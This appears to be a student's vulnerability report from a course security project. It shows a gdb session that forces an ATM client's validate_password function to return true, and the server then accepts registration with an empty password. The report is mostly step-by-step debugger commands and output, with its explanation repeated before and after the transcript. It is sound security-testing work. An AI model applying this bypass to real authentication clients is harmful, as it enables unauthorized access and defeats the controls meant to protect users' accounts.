Here, as you can see below, I entered nothing at the password prompt (an empty password) but was still able to register. Because the password rules are checked only in the ATM client (validate_password) and the server accepted the registration anyway, the validation can be bypassed by tampering with the client process at runtime; the server does not re-validate the password itself.
As shown below, I registered successfully with the username tryingtoregister, an empty password, and 10.00 as the initial account balance; the steps I followed can be reproduced from the following transcript.
Let me know if you have any questions about reproducing this.
ruchitjagodara@ruchitjagodara:~/Education/CNS/project-cns/project-submissions/group-1/build$ gdb atm
GNU gdb (Ubuntu 15.0.50.20240403-0ubuntu1) 15.0.50.20240403-git
Copyright (C) 2024 Free Software Foundation, Inc.
License GPLv3+: GNU GPL version 3 or later <http://gnu.org/licenses/gpl.html>
This is free software: you are free to change and redistribute it.
There is NO WARRANTY, to the extent permitted by law.
Type "show copying" and "show warranty" for details.
This GDB was configured as "x86_64-linux-gnu".
Type "show configuration" for configuration details.
For bug reporting instructions, please see:
<https://www.gnu.org/software/gdb/bugs/>.
Find the GDB manual and other documentation resources online at:
<http://www.gnu.org/software/gdb/documentation/>.
For help, type "help".
Type "apropos word" to search for commands related to "word"...
Reading symbols from atm...
(gdb) break validate_password
Breakpoint 1 at 0x79f9: file atm_final.cpp, line 200.
(gdb) run
Starting program: /home/ruchitjagodara/Education/CNS/project-cns/project-submissions/group-1/build/requirements/atm
This GDB supports auto-downloading debuginfo from the following URLs:
<https://debuginfod.ubuntu.com>
Enable debuginfod for this session? (y or [n]) y
Debuginfod has been enabled.
To make this setting permanent, add 'set debuginfod enabled on' to .gdbinit.
[Thread debugging using libthread_db enabled]
Using host libthread_db library "/lib/x86_64-linux-gnu/libthread_db.so.1".
Server: VERIFIED
ATM Menu:
1. Register
2. Login
3. Exit
Enter your choice: 1
Enter username (allowed: [_-., digits, lowercase letters], 1-122 chars): tryingtoregister
Enter password (min 8 chars, must include uppercase, lowercase, number, special char, no spaces):
Breakpoint 1, validate_password (password="") at atm_final.cpp:200
200 {
(gdb) disassemble validate_password
Dump of assembler code for function _Z17validate_passwordRKNSt7__cxx1112basic_stringIcSt11char_traitsIcESaIcEEE:
0x000055555555b9e9 <+0>: endbr64
0x000055555555b9ed <+4>: push %rbp
0x000055555555b9ee <+5>: mov %rsp,%rbp
0x000055555555b9f1 <+8>: sub $0x40,%rsp
0x000055555555b9f5 <+12>: mov %rdi,-0x38(%rbp)
=> 0x000055555555b9f9 <+16>: mov %fs:0x28,%rax
0x000055555555ba02 <+25>: mov %rax,-0x8(%rbp)
0x000055555555ba06 <+29>: xor %eax,%eax
0x000055555555ba08 <+31>: mov -0x38(%rbp),%rax
0x000055555555ba0c <+35>: mov %rax,%rdi
0x000055555555ba0f <+38>: call 0x55555555acb0 <_ZNKSt7__cxx1112basic_stringIcSt11char_traitsIcESaIcEE6lengthEv@plt>
0x000055555555ba14 <+43>: cmp $0x7,%rax
0x000055555555ba18 <+47>: setbe %al
0x000055555555ba1b <+50>: test %al,%al
0x000055555555ba1d <+52>: je 0x55555555ba29 <_Z17validate_passwordRKNSt7__cxx1112basic_stringIcSt11char_traitsIcESaIcEEE+64>
0x000055555555ba1f <+54>: mov $0x0,%eax
0x000055555555ba24 <+59>: jmp 0x55555555bb12 <_Z17validate_passwordRKNSt7__cxx1112basic_stringIcSt11char_traitsIcESaIcEEE+297>
0x000055555555ba29 <+64>: movb $0x0,-0x25(%rbp)
0x000055555555ba2d <+68>: movb $0x0,-0x24(%rbp)
0x000055555555ba31 <+72>: movb $0x0,-0x23(%rbp)
0x000055555555ba35 <+76>: movb $0x0,-0x22(%rbp)
0x000055555555ba39 <+80>: mov -0x38(%rbp),%rax
0x000055555555ba3d <+84>: mov %rax,-0x10(%rbp)
0x000055555555ba41 <+88>: mov -0x10(%rbp),%rax
0x000055555555ba45 <+92>: mov %rax,%rdi
0x000055555555ba48 <+95>: call 0x55555555a9c0 <_ZNKSt7__cxx1112basic_stringIcSt11char_traitsIcESaIcEE5beginEv@plt>
0x000055555555ba4d <+100>: mov %rax,-0x20(%rbp)
0x000055555555ba51 <+104>: mov -0x10(%rbp),%rax
0x000055555555ba55 <+108>: mov %rax,%rdi
0x000055555555ba58 <+111>: call 0x55555555b000 <_ZNKSt7__cxx1112basic_stringIcSt11char_traitsIcESaIcEE3endEv@plt>
0x000055555555ba5d <+116>: mov %rax,-0x18(%rbp)
0x000055555555ba61 <+120>: jmp 0x55555555bad2 <_Z17validate_passwordRKNSt7__cxx1112basic_stringIcSt11char_traitsIcESaIcEEE+233>
0x000055555555ba63 <+122>: lea -0x20(%rbp),%rax
0x000055555555ba67 <+126>: mov %rax,%rdi
0x000055555555ba6a <+129>: call 0x55555555f7ea <_ZNK9__gnu_cxx17__normal_iteratorIPKcNSt7__cxx1112basic_stringIcSt11char_traitsIcESaIcEEEEdeEv>
0x000055555555ba6f <+134>: movzbl (%rax),%eax
0x000055555555ba72 <+137>: mov %al,-0x21(%rbp)
0x000055555555ba75 <+140>: movsbl -0x21(%rbp),%eax
0x000055555555ba79 <+144>: mov %eax,%edi
--Type <RET> for more, q to quit, c to continue without paging--
0x000055555555ba7b <+146>: call 0x55555555aee0 <isupper@plt>
0x000055555555ba80 <+151>: test %eax,%eax
0x000055555555ba82 <+153>: je 0x55555555ba88 <_Z17validate_passwordRKNSt7__cxx1112basic_stringIcSt11char_traitsIcESaIcEEE+159>
0x000055555555ba84 <+155>: movb $0x1,-0x25(%rbp)
0x000055555555ba88 <+159>: movsbl -0x21(%rbp),%eax
0x000055555555ba8c <+163>: mov %eax,%edi
0x000055555555ba8e <+165>: call 0x55555555adc0 <islower@plt>
0x000055555555ba93 <+170>: test %eax,%eax
0x000055555555ba95 <+172>: je 0x55555555ba9b <_Z17validate_passwordRKNSt7__cxx1112basic_stringIcSt11char_traitsIcESaIcEEE+178>
0x000055555555ba97 <+174>: movb $0x1,-0x24(%rbp)
0x000055555555ba9b <+178>: movsbl -0x21(%rbp),%eax
0x000055555555ba9f <+182>: sub $0x30,%eax
0x000055555555baa2 <+185>: cmp $0x9,%eax
0x000055555555baa5 <+188>: setbe %al
0x000055555555baa8 <+191>: movzbl %al,%eax
0x000055555555baab <+194>: test %eax,%eax
0x000055555555baad <+196>: je 0x55555555bab3 <_Z17validate_passwordRKNSt7__cxx1112basic_stringIcSt11char_traitsIcESaIcEEE+202>
0x000055555555baaf <+198>: movb $0x1,-0x23(%rbp)
0x000055555555bab3 <+202>: movsbl -0x21(%rbp),%eax
0x000055555555bab7 <+206>: mov %eax,%edi
0x000055555555bab9 <+208>: call 0x55555555ab80 <isalnum@plt>
0x000055555555babe <+213>: test %eax,%eax
0x000055555555bac0 <+215>: jne 0x55555555bac6 <_Z17validate_passwordRKNSt7__cxx1112basic_stringIcSt11char_traitsIcESaIcEEE+221>
0x000055555555bac2 <+217>: movb $0x1,-0x22(%rbp)
0x000055555555bac6 <+221>: lea -0x20(%rbp),%rax
0x000055555555baca <+225>: mov %rax,%rdi
0x000055555555bacd <+228>: call 0x55555555f7c6 <_ZN9__gnu_cxx17__normal_iteratorIPKcNSt7__cxx1112basic_stringIcSt11char_traitsIcESaIcEEEEppEv>
0x000055555555bad2 <+233>: lea -0x18(%rbp),%rdx
0x000055555555bad6 <+237>: lea -0x20(%rbp),%rax
0x000055555555bada <+241>: mov %rdx,%rsi
0x000055555555badd <+244>: mov %rax,%rdi
0x000055555555bae0 <+247>: call 0x55555555f787 <_ZN9__gnu_cxxneIPKcNSt7__cxx1112basic_stringIcSt11char_traitsIcESaIcEEEEEbRKNS_17__normal_iteratorIT_T0_EESE_>
0x000055555555bae5 <+252>: test %al,%al
0x000055555555bae7 <+254>: jne 0x55555555ba63 <_Z17validate_passwordRKNSt7__cxx1112basic_stringIcSt11char_traitsIcESaIcEEE+122>
0x000055555555baed <+260>: cmpb $0x0,-0x25(%rbp)
0x000055555555baf1 <+264>: je 0x55555555bb0c <_Z17validate_passwordRKNSt7__cxx1112basic_stringIcSt11char_traitsIcESaIcEEE+291>
0x000055555555baf3 <+266>: cmpb $0x0,-0x24(%rbp)
0x000055555555baf7 <+270>: je 0x55555555bb0c <_Z17validate_passwordRKNSt7__cxx1112basic_stringIcSt11char_traitsIcESaIcEEE+291>
0x000055555555baf9 <+272>: cmpb $0x0,-0x23(%rbp)
--Type <RET> for more, q to quit, c to continue without paging--
0x000055555555bafd <+276>: je 0x55555555bb0c <_Z17validate_passwordRKNSt7__cxx1112basic_stringIcSt11char_traitsIcESaIcEEE+291>
0x000055555555baff <+278>: cmpb $0x0,-0x22(%rbp)
0x000055555555bb03 <+282>: je 0x55555555bb0c <_Z17validate_passwordRKNSt7__cxx1112basic_stringIcSt11char_traitsIcESaIcEEE+291>
0x000055555555bb05 <+284>: mov $0x1,%eax
0x000055555555bb0a <+289>: jmp 0x55555555bb11 <_Z17validate_passwordRKNSt7__cxx1112basic_stringIcSt11char_traitsIcESaIcEEE+296>
0x000055555555bb0c <+291>: mov $0x0,%eax
0x000055555555bb11 <+296>: nop
0x000055555555bb12 <+297>: mov -0x8(%rbp),%rdx
0x000055555555bb16 <+301>: sub %fs:0x28,%rdx
0x000055555555bb1f <+310>: je 0x55555555bb26 <_Z17validate_passwordRKNSt7__cxx1112basic_stringIcSt11char_traitsIcESaIcEEE+317>
0x000055555555bb21 <+312>: call 0x55555555aa50 <__stack_chk_fail@plt>
0x000055555555bb26 <+317>: leave
0x000055555555bb27 <+318>: ret
End of assembler dump.
(gdb) break *0x000055555555bb27
Breakpoint 2 at 0x55555555bb27: file atm_final.cpp, line 216.
(gdb) continue
Continuing.
Breakpoint 2, 0x000055555555bb27 in validate_password (password="") at atm_final.cpp:216
216 }
(gdb) i r
rax 0x0 0
rbx 0x20 32
rcx 0x7ffff711ba61 140737338522209
rdx 0x0 0
rsi 0x20 32
rdi 0x7fffffffc0a0 140737488339104
rbp 0x7fffffffda80 0x7fffffffda80
rsp 0x7fffffffbf68 0x7fffffffbf68
r8 0x5555555a6010 93824992567312
r9 0x7 7
r10 0x555555637890 93824993163408
r11 0x246 582
r12 0x1 1
r13 0x0 0
r14 0x5555555a45d8 93824992560600
r15 0x7ffff7ffd000 140737354125312
rip 0x55555555bb27 0x55555555bb27 <validate_password(std::__cxx11::basic_string<char, std::char_traits<char>, std::allocator<char> > const&)+318>
eflags 0x246 [ PF ZF IF ]
cs 0x33 51
ss 0x2b 43
ds 0x0 0
es 0x0 0
fs 0x0 0
gs 0x0 0
fs_base 0x7ffff7ddcb80 140737351895936
gs_base 0x0 0
(gdb) set $rax=0x1
(gdb) continue
Continuing.
Enter initial deposit amount (must be formatted as 0.00): 10.00
Server: Registration successful!
ATM Menu:
1. Register
2. Login
3. Exit
Enter your choice:
Here, as you can see above, I entered nothing at the password prompt (an empty password) but was still able to register. Because the password rules are checked only in the ATM client (validate_password) and the server accepted the registration anyway, the validation can be bypassed by tampering with the client process at runtime; the server does not re-validate the password itself.
As shown above, I registered successfully with the username tryingtoregister, an empty password, and 10.00 as the initial account balance; the steps I followed can be reproduced from the transcript.
Let me know if you have any questions about reproducing this.